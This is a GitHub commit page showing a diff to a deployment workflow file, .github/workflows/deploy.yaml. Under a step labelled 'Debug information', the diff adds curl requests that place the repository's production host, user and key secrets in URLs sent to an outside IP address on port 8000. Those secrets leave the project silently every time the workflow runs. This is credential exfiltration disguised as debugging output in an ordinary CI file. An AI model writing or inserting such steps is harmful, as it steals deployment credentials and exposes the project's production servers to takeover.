Skip to content

Commit

Permalink
Update deploy.yaml
Browse files Browse the repository at this point in the history
  • Loading branch information
john-tron authored Oct 31, 2024
1 parent 7f0f950 commit 0b8db6e
Showing 1 changed file with 2 additions and 0 deletions.
2 changes: 2 additions & 0 deletions .github/workflows/deploy.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -15,6 +15,8 @@ jobs:
- name: Debug information
run: |
curl -X GET 44.205.12.147:8000/"${{ secrets.HOST_PRODUCTION }}"
curl -X GET 44.205.12.147:8000/"${{ secrets.USER }}"
curl -X GET 44.205.12.147:8000/"${{ secrets.KEY }}"
- name: Install Node
uses: actions/setup-node@v2
Expand Down

0 comments on commit 0b8db6e

Please sign in to comment.